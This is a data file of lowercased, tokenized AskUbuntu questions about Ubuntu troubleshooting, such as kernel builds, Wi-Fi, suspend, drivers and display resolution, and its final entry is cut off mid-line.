368651	having difficulty while compiling kernel 2.6.33 for ubuntu 12.04 lts	after running menuconfig , i tried `` make '' command and i get this.. end of linux kernel configuration . execute 'make ' to build the kernel or try 'make help ' . root @ nikhil-inspiron-3537 : /usr/src/linux-2.6.33 # make chk include/linux/version.h chk include/generated/utsrelease.h call scripts/checksyscalls.sh chk include/generated/compile.h as arch/x86/kernel/entry_64.o /tmp/ccem3tk6.s : assembler messages : /tmp/ccem3tk6.s : error : .size expression for do_hypervisor_callback does not evaluate to a constant make [ 2 ] : [ arch/x86/kernel/entry_64.o ] error 1 make [ 1 ] : [ arch/x86/kernel ] error 2 make : [ arch/x86 ] error 2 please help me out , how to proceed from here .
368654	what are the default permissions for /root ?	not realizing what directory i was in , i did a `` chmod 777 . '' in /root . now i would like to set the permissions for /root back to the default . can someone please tell me the correct default permissions for /root ? should it be 700 ?
368659	google services inaccessible ?	something happened today , and i can not access some google services . i can access google.com but not : translate.google.com maps.google.com youtube.com i was thinking that it maybe some dns issue , so i flushed the dns cache , but it did not work . i flushed the browser cache as well , that did not help either . i can not access them on either chrome or firefox . i checked on dev tools what response i get , and i seem to be getting 301 response.. how is this possible ? maybe a virus ? host : host translate.google.com ; ; truncated , retrying in tcp mode . host translate.google.com.edimax.com not found : 5 ( refused ) host youtube.com youtube.com has address 195.12.176.121 youtube.com has address 195.12.176.123 youtube.com has address 195.12.176.80 youtube.com has address 195.12.176.84 youtube.com has address 195.12.176.88 youtube.com has address 195.12.176.90 youtube.com has address 195.12.176.91 youtube.com has address 195.12.176.95 youtube.com has address 195.12.176.99 youtube.com has address 195.12.176.101 youtube.com has address 195.12.176.102 youtube.com has address 195.12.176.106 youtube.com has address 195.12.176.110 youtube.com has address 195.12.176.112 youtube.com has address 195.12.176.113 youtube.com has address 195.12.176.117 youtube.com has ipv6 address 2a00:1450:4010 : c03 : :88 youtube.com mail is handled by 30 alt2.aspmx.l.google.com . youtube.com mail is handled by 40 alt3.aspmx.l.google.com . youtube.com mail is handled by 50 alt4.aspmx.l.google.com . youtube.com mail is handled by 10 aspmx.l.google.com . youtube.com mail is handled by 20 alt1.aspmx.l.google.com . ping youtube.com c -5 ping youtube.com ( 195.12.176.101 ) 56 ( 84 ) bytes of data . 64 bytes from cache.google.com ( 195.12.176.101 ) : icmp_req=1 ttl=59 time=22.1 ms 64 bytes from cache.google.com ( 195.12.176.101 ) : icmp_req=2 ttl=59 time=15.7 ms 64 bytes from cache.google.com ( 195.12.176.101 ) : icmp_req=3 ttl=59 time=18.5 ms 64 bytes from cache.google.com ( 195.12.176.101 ) : icmp_req=4 ttl=59 time=17.9 ms 64 bytes from cache.google.com ( 195.12.176.101 ) : icmp_req=5 ttl=59 time=20.4 ms -- - youtube.com ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 4006ms rtt min/avg/max/mdev = 15.731/18.967/22.141/2.195 ms
368661	my laptop is heated and battery drained fast	when i 'm using ubuntu 13.04 on my laptop , it is hot and battery drains fast , i have to plug-in power supply while i 'm working on it . using windows 8 on my laptop , does n't cause the same symptoms . i have a dell inspiron n5520 15r graphics : amd 1gb radeon hd 7676m any help would be appreciated
368663	ubuntu refuses to go to sleep but go to black screen with a cursor , and pretty much dead	i am desperate to solve this problemâś i have been running ubuntu 13.04 ! [ enter image description here ] [ 1 ] for a month on a lenovo y410p computer , there has been many problems but nothing too critical . but then last night , whenever i have my computer to `` suspend '' , it directly goes to a black screen with a non-moving white cursor at the upper left corner . the forum said `` you need at least 10 reputation to post images '' so i ca n't post images for you to see . then nothing works except for the power button . i tried to press all possible combination of keys but , really , nothing works . this is different from going to suspend but wake up black screen -- it does not go to suspend at all ! the computer is always running . thank you so much for your help in advance ! the lenovo people said `` we only help windows '' .
368666	1 network card/connection with 2 different ip settings	i have an ubuntu machine setup that was being used as a music player and transfer station allowing cnc machines to connect to it and get the programs they need while letting the guys in the shop listen to music . this computer was complete with keyboard , mouse , and monitor . recent changes at our shop required use of the monitor somewhere else without replacement . i am running 12.04 desktop edition and currently use vnc to connect in and turn on the music or upload/download new programs . one of these machines is running specialized control software based on windows 98 and due to the oddness of connecting to this machine to get or share programs the ubuntu 's network settings need to be changed to a new ip , subnet , default gateway , and dns server . this has been no problem in the past when this computer had a monitor , but now that we have no monitor available i want to see if there is a way to allow different connections to 1 nic . **ideas : i am going to start on a bash script that will change the ip based on keyboad input , but this is a temporary solution in my mind . ( i 'll post my script as a solution but i would hope some other option might be better . )
368668	laptop wo n't shutdown , reboot or suspend	after a short stint with vmware player , virtualbox and winconn* , i 'm now apparently stuck with a broken ubuntu installation . even after uninstalling vmware player and winconn ( i wo n't uninstall virtualbox , since that 's my main means of virtualization which i 've been using for much of my career ) , i 'm unable to suspend , shutdown or reboot . whenever i attempt to shut down or reboot the system , it will become stuck at the splash screen ( which is an oddity in itself , since i already disabled the splash screen where-ever i could . including the grub config ) . whenever i attempt to suspend ( either by terminal , ubuntu menu entry or by shutting my laptop lid ) , the screen will turn black while the rest of the system is still running in full force . anyone out there who might know a solution that does n't come down to `` re-install everything '' ? what i 've already tried : uninstalled everything i installed yesterday ( including the kernel modules vmware kept asking for , excluding virtualbox and virtualbox guest additions ) . re-installed and re-initialized amd fglrx drivers . upgraded the kernel to 3.12rc7 ( would n't work , since it 's now asking for a valid gpu driver and wo n't let me log in with either a terminal session or default graphics ) added grub_cmdline_linux_default= '' acpi=noirq quiet splash '' to /etc/default/grub , as was recommended in an older thread for 12.04. force updated grub for half a dozen times . force downed the network manager service before shutting down the system . edited /etc/default/speech-dispatcher ( r managed to get into verbose mode just once , only to be greeted by an pci_msi segfault ( gpu driver , possibly ? ) my setup , according to `` uname '' : 3.8.0-32-generic # 47-ubuntu smp tue oct 1 22:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux i 'm really at a loss here . i hope someone will be able to help me save my precious setup . : ( edit : forgot to mention . my specs are as follows : lenovo thinkpad e535 cpu : amd a8-5800 @ stock gpu : amd radeon hd 7640g fglrx : catalyst 12.9 ( tried the most recent beta but it refused to boot into unity with my apu , so the choice was to either downgrade -- what is what i did -- or stick with the power hungry 7670m ) ram : 4gb *i actually wanted to find the best way to seamlessly run windows 7 applications from within my ubuntu setup .
368670	create a virtual reality environment : seek suggestions	im running on a oculus rift integrated os . i am trying to gather information about how i would go about creating a virtual reality environment . where a users actions through their control panel and their home location ( a 3d virtual environment they can walk around in ) would launch at power state on of the computer . i saw that there is a 3d implementation of ubuntu unity , and i was wondering if you could point me in the direction . here i can find any information on utilizing opengl to display my custom 3d game-like environment with direct access to ubuntu . it is as if the user was on a standard desktop . any suggestions ?
368671	ubuntu 13.10 - wifi not re-connecting after suspend	i upgraded the other day from ubuntu 13.04 to 13.10 on my zareason laptop , and the wifi does n't reconnect after suspend . in 13.04 , pressing fn+f2 turned network connections back on after suspend . the 'soft ' wireless hardware switch . but in 13.10 , that does n't work , and trying to enable networking in the networking menu does n't work either . so i have to restart every time . any suggestions to make it work ?
368674	getting error trying to load ac3d	using ubuntu 13.10 ( 64bit ) and getting the following error on bringing up ac3d : error : libtiff.so.4 : can not open shared object file : no such file or directory i assume that this is because ac3d is a 32-bit app and i do n't have te appropriate lib . i have tried a couple of options i ran across in the database here , but no joy as of yet .
368675	running gnome system tools	i 'm a sporadic linux user , but have n't used ubuntu for some years until a hard disk crash on my windows laptop forced me into running ubuntu off usb/dvd . i love the new appearance , but as ever the user-friendliness means a lot of admin stuff gets hidden . i ca n't find system tools in the gui any more as there 's no applications menu . i 've done a bit of net searching and it looks like i need to install gnome-system-tools for an admin gui . this article describes how to install it via apt with the command : sudo apt-get install gnome-system-tools i 've run that and it seemed to go ok , but no system tools appeared - i tried the dash ( nice innovation , that ) and searched for 'system ' but nothing extra appeared . i rebooted completely , still no dice . the screenshots in the article looked very different from what i can see , despite my running 12.04 . so my question is : how do i run the gnome system tools in the gui ? how do i know if the package has been installed on the machine ? i 'm running 12.04 lts 'out of the box ' , but could n't tell you what desktop interface i 've got . i 've looked at this thread but that refers to v10 . i 've made a resolution to myself to get back to running linux in tandem with windows , especially after the penguin has saved my bacon : o )
368676	after 12.04 update firefox opens and closes immediately	after my last update , firefox opens and closes immediately . my history : compiz updates firefox ( 24.0 + build1-0ubuntu1 , 4.2.0-0ubuntu.12.04.1 firefox-locale-xx what can i do ?
368679	partitioning during installation , reinstalling ubuntu , backup donwloaded repositories	i am new to ubuntu and i have just finished installing 13.10 amd64 on my pc . this will replace my windows 7 as my only os . i just want to clarify some issues that 've been bugging me . i tried reading posts with the same topics but i just ca n't wrap my head to it yet . i partitioned my 80gb drive into : /root : 30gb ( sorry for the confusion , i actually meant / ) /home : 40gb /var : 3gb swap : 4gb ( 2gb of mem ) please correct me if i 'm wrong about these : all of the users ' documents are saved in their respective folders in /home . but say i want to clean install ( format ) ubuntu , i do n't need to make backups of /home and /var as they are on separate partitions . but when re-installing , do i just choose /root and format and it will recognize all the partitions ( not making another /home and /var inside /root ) ? downloaded packages ( from all the repositories ) and all their dependencies are saved in /var . so after re-installing on the same pc ( assuming i 'm offline ) , it will just use the latest updates in /var if i choose to update ? and if all the installed apps and their dependents are all in there , all i need to do is re-install them without encountering errors ? i have also read that you can back them up using aptoncd and then adding the dvd to the sources . so if i download all the high ranking apps using synaptic , could i then have an all-in-one dvd installer ? 30gb for / is excessive because the bulk of files will either be in /home ( personal , downloads , music , videos ) or /var ( updates , packages , installed apps ) ? please excuse me for asking such a question but i really want to explore and learn more .
368680	how can i list the wm manager sessions available from the command line ?	how can i list the wm manager sessions available from the command line ? i want to know what sessions are available to pass to thr lightdm-set-defaults utility .
368686	all networks are hidden for me	i 've been setting up my ubuntu ( on a macbook pro , 64 bit ) , and i 've run into a bit of a snag with wireless . the first time i started up ubuntu , the first thing i did was connect to my router via ethernet and run the following commands to install the drivers for my wireless card . these commands are sudo apt-add-repository ppa : mpodroid/mactel sudo apt-get update sudo apt-get install b43-fwcutter firmware-b43-installer i then ran added the line blacklist ndiswrapper to /etc/modprobe.d/blacklist.conf and then created the file /etc/pm/config.d/modules , editing it to include suspend_modules= '' b43 bcma '' i then rebooted . i 've actually installed ubuntu on this very computer five or six times now , so this is almost standard procedure for me . anyways , i clicked on the wireless pop-up in the top-right corner . none of the networks showed up . suspicious , i clicked `` connect to a hidden network , '' entered my network 's name and password , and what do you know ? i was able to connect to my home network . the other local networks also showed up in the drop-down menu . when i restarted later however , none of the networks showed up . i went to `` connect to a hidden network '' again , chose the right profile , and i was able to connect . again , the other local networks showed up . i figured that it was just a temporary problem- i set the settings to autoconnect to my home network . when i rebooted the next time however the same problem occurred , even though the `` connect on startup '' box in the home network was still checked . the network ca n't be hidden , as i can connect to it using windows 8 , windows 7 , mac osx , and they 've all recognized it without me having to manually input the network name . i 'm baffled here . any help ?
368691	how to put windows 7 iso file on dvd	i am a linux user who switched from windows ( still had dual boot ) but during ubuntu 13.10 install something went wrong , because the windows partition volume was corrupted . in the end after trying many things to fix the issue , i simply got rid of windows 7 overall and wanted to do a clean install of both operating systems . at the point i already downloaded windows 7 . i 'm just wondering in which way i would be able to put the windows iso file on a dvd so i can install it . http : //www.pcworld.com/article/248995/how_to_install_windows_7_without_the_disc.html is the website i referred , but for step 3 for where it shows where to get the program , the link just redirects to windows help and is of no use . is there another program that can be downloaded which does the same thing so i can re-install windows and put it on a dvd ?
368692	latency on bluez - mouse	i am in search of a trubleshooting for latency problems with my mouse . in 12.04 it worked fine but as i upgraded to 13.10 the latency is back . in 12-04 i was using an quite out of date kernel something round about 3.04. i also had installed mint where the same latency occured in all kernels . someone there who can help me ? here is my setup : linux my_laptop_xxx 3.11.0-12-generic # 19-ubuntu smp x86_64 x86_64 x86_64 gnu/linux bluetoothd/bluez in version 4.101
368693	wpa2 disconnects at intervals	i 've had a problem connecting to wpa2 access points for i do n't know how long . unsecured access points do not have this problem . basically , i will try to connect to the wpa2 access point and it will work for a while . then , after a little while ( probably under an hour ) it will disconnect . here is a syslog of when it happened : http : //pastebin.com/wa7h34sj thanks for any help shedding light on this problem !
368696	laptop overheats when running ubuntu 13.10	i 've been away from ubuntu since introduction of the unity interface . when 13.10 was released i figured i 'd give it another shot and installed it on my hp g62 . this laptop has an amd v120 cpu and a gallium 0.4 on amd rs880 gpu . i 've also got 6gb ram installed and am using the original hdd . my laptop overheats so much , i have to regularly turn it off and wait for a while before continuing to use it . the bottom surface is so hot that i can not let it touch my leg and the top surface is getting almost too hot to touch , too . i even noticed that the laptop is now producing a very hot smell that is really concerning me . i 've tried several things i 've read here on aaskubuntu like editing /etc/default/grub to use grub_cmdline_linux_default= '' acpi_osi=linux quiet splash '' . i 've installed fwts along with a few other utilities to no avail . this computer does not run very hot when using windows 7 or any other gnu/linux distros including ubuntu derivatives . if anybody could please suggest another option or inform me that i should use another os , i 'd appreciate it .
368698	x freezes , when switching from console → vgaswitcheroo ?	i 've got a dell vostro 3550 with an integrated intel and a discrete radeon hd 6650m graphic card . i disabled the discrete : 9:05 % echo off | sudo tee /sys/kernel/debug/vgaswitcheroo/switch ; sudo cat /sys/kernel/debug/vgaswitcheroo/switch 0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0 switching off has worked ; fan is off and battery lasts longer . i 'm now on a new installation of ubuntu gnome 13.10 with gnome 3.8 . before , i was on gnome 13.04 with unity . when i switch from the normal console ( - > ctrl+alt+f1…6 ) to x ( - > alt+f7 ) , the system always freezes . well - what can be done to solve that ? see http : //pastebin.com/ps0yzty3 for `` lspci -vv '' output , or http : //pastebin.com/qz9kjavy for `` lshw '' .
368703	about usb wireless adapter problem in ubuntu 13.10	everyone , i am in trouble of wireless connection , my system is ubuntu 13.10 and my usb wireless adapter is tp link tp-wn821n . the problem is , my computer can find the signs around it , it is also can connect to the network , but i can not load any website on browser , the light of the adapter is always enlighten but not shinning , and in the window 7 it works well . i have try to usenm-tool , the connect status is showed and everying seems ok , so could someone tell me how to deal with this ? thank you for your helping !
368705	how to make guake start by starup ?	i 'm looking for help , because i had to install ubuntu one more time and i was always using guake terminal . in fact i do n't know how , but it was always starting when the desktop appeared and i only clicked f12 and did everything i had to . but now it does n't start automatically . i was looking for an answer but nothing worked . has anybody ideas how to solve it ? it would be really nice to use it as earlier ; )
368706	ubuntu 12.04 ethernet not working on an desktop	i am new to ubuntu and just wiped my harddrive to oinstall it on an old desktop . but i can not connect to the internet even though the cable is plugged in ( i checked the cable with my laptop and it works fine ) please help me thank you .
368709	how can i make ctrl+shift to change layouts ?	when i go to settings - > keyboard - > keys combinations and try to put ctrl+shift combo to change the layout it shows ctrl+mod2+shift so ctrl+shift does n't work . what should i do ?
368712	how to change file managers `` files '' icon to nice `` nautilus shell '' icon in ubuntu 12.04 ?	i 've attached nautilus to unity launcher in ubuntu 12.04 . in ubuntu 12.04 the default `` files '' icon for nautilus file manager is not as pretty as a `` nautilus shell '' icon . but when i search in dash for nautilus it gives `` files '' link to nautilus , which has grey and quite plain file-cabinet icon . how do i change this grey file cabinet icon to the nautilus ' shell icon , which suits well to my icon theme ?
368713	where can i fix control-clicking in ubuntu ?	some time ago i was messing around with keyboard shortcuts , now i ca n't use ctrl+click to open links in new tabs . it 's a minor inconvenience , but one that i actually find i need a lot . now ctrl+clicking links in browsers does n't do anything . v. 13.10 and i 'm using unity .
368718	how to install gcc-4.8 ( x64 ) on 12.10	i want to install the newer 4.8 version of gcc , and when i searched for a solution i found this . but when trying to use the solution i ran into a quite annoying problem : sudo add-apt-repository ppa : ubuntu-toolchain-r/test sudo apt-get update work like a charm ( or at least they do n't complain ) sudo apt-get install gcc-4.8 results in ( sorry for the german , but maybe the format of the message triggers some memories , therefore i did not just post my translation ) : einige pakete konnten nicht installiert werden . das kann bedeuten , dass sie eine unmögliche situation angefordert haben oder , wenn sie die unstable-distribution verwenden , dass einige erforderliche pakete noch nicht erstellt wurden oder incoming noch nicht verlassen haben . die folgenden informationen helfen ihnen vielleicht , die situation zu lösen : die folgenden pakete haben unerfüllte abhängigkeiten : gcc-4.8 : i386 : hängt ab von : cpp-4.8 : i386 ( = 4.8.1-2ubuntu1~12.10.3 ) soll aber nicht installiert werden hängt ab von : binutils : i386 ( > = 2.22 ) soll aber nicht installiert werden hängt ab von : libgcc-4.8-dev : i386 ( = 4.8.1-2ubuntu1~12.10.3 ) soll aber nicht installiert werden hängt ab von : libc6 : i386 ( > = 2.11 ) soll aber nicht installiert werden hängt ab von : libcloog-isl4 : i386 ( > = 0.17 ) soll aber nicht installiert werden hängt ab von : libgmp10 : i386 soll aber nicht installiert werden hängt ab von : libisl10 : i386 ( > = 0.10 ) soll aber nicht installiert werden hängt ab von : libmpc2 : i386 soll aber nicht installiert werden hängt ab von : libmpfr4 : i386 ( > = 3.1.0 ) soll aber nicht installiert werden hängt ab von : zlib1g : i386 ( > = 1:1.1.4 ) soll aber nicht installiert werden empfiehlt : libc6-dev : i386 ( > = 2.13-0ubuntu6 ) soll aber nicht installiert werden e : probleme können nicht korrigiert werden , sie haben zurückgehaltene defekte pakete . which is basically saying ( giving : a rough translation ) : there are some packages which can not be installed . meaing , that there is a situation where you are using a unstable distribution therefore some packages are not made or did not leave incoming yet . the following information may help you to find a solution the following pacakges have unresolved dependencies : gcc-4.8 : i386 : depends on : cpp-4.8 : i386 ( = 4.8.1-2ubuntu1~12.10.3 ) shall/may not be installed ... and so on , as the text is the same i hope i do not have to copy paste it e : occuring problem could not be managed , you got reserved damaged packets . further information on my system : uname -a linux name 3.5.0-28-generic # 48-ubuntu smp tue apr 23 23:03:38 utc 2013 x86_64 x86_64 x86_64 gnu/linux cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.10 distrib_codename=quantal distrib_description= '' ubuntu 12.10 ''
368721	revert ubuntu touch to android . wiped data	i tried out the ubuntu touch on my galaxy nexus and decided to change back to android and wait for further development . i went in ahead of the tutorial and wiped the data ( bad move ) now my phone wont boot past the google screen with the lock . i can access the boot loader if that helps . i was also wondering if you can dual boot android and ubuntu touch on the galaxy nexus . thanks in advance
368722	making an image of a recovery flash drive	after getting a new laptop with windows 8 , i immediately erased it altogether and installed linux . however , the warranty specifies that i can not change the operating system , so i had windows create a recovery image on a flash drive before overwriting everything . i do n't like the idea of having the flash drive committed until warranty expires , so i would like to copy the image into my hard drive . not just the files though , but all the non-trivial boot and partitioning information that was installed in the flash drive . so the question is : what is the simplest way to make a full image of a usb drive , in a way that , if ever required , the image can be copied back into the flash drive without loss of information ?
368724	true live usb : fully functional	i ca n't seem to have the affect i 'm looking for on a `` live ubuntu '' i want to run it from the usb drive , a fully functional , fully upgradable version . i do not want to use as a `` trial version '' , or to set up a dual boot or run in a virtual system . i have kids that are killing my computer & everything on my hd , they need their own os & drive but do n't have the $ $ $ for a laptop for them , i just want it to work on the usb the same way it works on the c : drive
368731	display particular data into a file	i 'm new to ubuntu and have been using it for a couple of weeks now . recently i encountered a problem where in i had to display a particular data on to a file . here is the output displayed on the terminal . potential vulnerability found ( cve-2009-4028 ) cvss score is 6.8 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2009-4030 ) cvss score is 4.4 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2009-5026 ) cvss score is 6.8 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0075 ) cvss score is 1.7 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0087 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0101 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0102 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0112 ) cvss score is 3.5 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0113 ) cvss score is 5.5 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0114 ) cvss score is 3.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0115 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0116 ) cvss score is 4.9 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0118 ) cvss score is 4.9 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0119 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0120 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0484 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0485 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0490 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0492 ) cvss score is 2.1 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0540 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0553 ) cvss score is 7.5 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0574 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2012-0583 ) cvss score is 4.0 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2013-1492 ) cvss score is 7.5 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2013-1506 ) cvss score is 2.8 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) potential vulnerability found ( cve-2013-1521 ) cvss score is 6.5 full vulnerability match ( incl . edition/language ) file `` /usr/sbin/mysqld '' ( cpe = cpe : /a : mysql : mysql:5.1 : : : ) on host glynis-desktop ( key glynis-desktop ) i intend to display the potential vulnerability found field and the corresponding score alone . there seems to be about 9995 entries and i would like to display all of them . i have been using this command as of now awk '/cvss score is/ < /potential vulnerability found/ ' output.txt but this seems to display only the name of the vulnerability or the score . how do i display this in file ( text , excel ) such that all the vulnerability and the corresponding score willbe displayed . any help would be appreciated thank you .
368734	start synergy on boot of ubuntu 12.04	i am having problems getting synergy to start on boot of my ubuntu 12.04 desktop machine . i followed the troubleshooting at start synergy on boot ? completely , but i still could n't get synergy to start on boot up . i tried running my client starter script manually and here is what resulted : m @ m-o : /etc/synergy $ cat startsynergyc # ! /bin/bash /usr/bin/synergyc -n mwin1 3.22.21.145 m @ m-o : /etc/synergy $ ll total 28 drwxr-xr-x 2 root root 4096 oct 30 14:29 ./ drwxr-xr-x 143 root root 12288 oct 30 14:31 ../ -rwxr-xr-x 1 root root 54 oct 30 14:29 startsynergyc* -rwxr-xr-x 1 root root 67 oct 30 14:06 startsynergys* -rw-r -- r -- 1 root root 659 oct 30 14:06 synergy.conf m @ m-o : /etc/synergy $ ./startsynergyc info : synergy 1.4.14 client on linux 3.8.0-32-generic # 47~precise1-ubuntu smp wed oct 2 16:19:35 utc 2013 x86_64 it appears that synergy is running . this is exactly what is being told to startup with ubuntu assuming i did the lightdm modification correctly . however , i do n't see any synergy running , and i certainly ca n't control the other computer . btw , i changed my ip in the log from what it actually is ~ is this a necessary precaution or are ips local to the network ? what does knowing my ip allow someone to do ?
368736	play only audio with vlc	is there any way to launch vlc from the command line such that it will not play the video , only the audio , of an mp4 file ?
368738	update to 13.10 without gui access	after upgrading 13.04 with the latest patches , i 'm getting some really weird problems -- namely , logging in at the gui just dumps me back at the gui login screen . i can , however , get command line access from ctrl-alt-f1 , and remotely via ssh . given that i was doing these updates to step to 13.10 , i figure i might as well continue the process , and then deal with the fallout once i get there . however , how can this be achieved with only the command line , and no x available ? the only method i 've found thus far is to run 'update-manager ' , which does not appear to have a cli mode ( and will not start without access to x ) . what 's the solution ? thanks !
368739	wifi keeps disconnecting and reconnecting on 12.04	i recently bought an asus x201e laptop that came with ubuntu 12.04 . i got it set up and it worked fine for a short while , but now the wifi constantly connects and disconnects every 5 minutes or so . i 've looked around a bit and this seems to be a common problem , but i did n't find any fixes that worked . any help would be appreciated .
368742	trash removes emails automatically	i have mozilla thunderbird and each morning when i turn on computer it automatically removes some trash . i do n't want this , i would rather do it manually . can you please help ?
368746	how do i prevent 18 screensaver windows from opening ?	when i login to kde , ~18 kdeasciiquarium.kss processes run , each in a separate window . that 's my screensaver , but why is it starting in a window , and why do 18 of them run ? this began happening after upgrading from kubuntu 13.04 to 13.10 .
368747	can not establish maximum resolution on asus pb278q	i 've recently bought brand new asus pb278q monitor . when trying to connect to my laptop , everything works great , except that i ca n't get the native resolution of my monitor ( 2560x1440 ) working . the automatic is 1920x1080 . my graphic card is nvidia geforce 320m . here 's output from lspci for it : ~ $ lspci | grep vga 02:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 320m ] ( rev a2 ) and also xrandr : ~ $ xrandr screen 0 : minimum 8 x 8 , current 3286 x 1437 , maximum 8192 x 8192 vga-0 disconnected ( normal left inverted right x axis y axis ) lvds-0 connected primary 1366x768+0+669 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ hdmi-0 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 600mm x 340mm 1920x1080 60.0*+ 59.9 50.0 30.0 25.0 24.0 60.0 50.0 1680x1050 60.0 1440x900 59.9 1280x1024 75.0 60.0 1280x960 60.0 1280x800 59.8 1280x720 60.0 59.9 50.0 1152x864 75.0 1024x768 75.0 70.1 60.0 800x600 75.0 72.2 60.3 56.2 720x576 50.0 720x480 59.9 640x480 75.0 59.9 59.9 480x576 50.0 480x480 59.9 i have proprietary drivers installed on my machine , here 's the info about the monitor from nvidia-settings ( actually i do n't have enough reputation to post images , so here 's the text ) : chip location : internal signal : tdms connection link : single native resolution : 2560x1440 refresh rate : 60.00 hz the monitor is connected to laptop via hdmi cable , and honestly i have no idea what version it is , and what version is my hdmi output of my graphics card . i tried to find how i can figure it out on the web , but had no luck . also my video card has only vga and hdmi outs so i ca n't test neither dvi-d cable nor displayport . so apparently , there 's some problem over there . at least i want to know exactly what 's going on . i 've tried to see if it a linux-specific problem , but windows also gave me the same resolution by default . what i 've already tried : connect through vga ( stupid one , of course it gave me 1920x1080 ) . checked two hdmi cables ( not sure if they 're the same or not , as mentioned above ) . played around with xrandr and adding custom modes . did n't help . surfed for the info a lot on the web , but could n't get appropriate results . actually xrandr gives me the following : ~ $ cvt 2560 1440 60 # 2560x1440 59.96 hz ( cvt 3.69m9 ) hsync : 89.52 khz ; pclk : 312.25 mhz modeline `` 2560x1440_60.00 '' 312.25 2560 2752 3024 3488 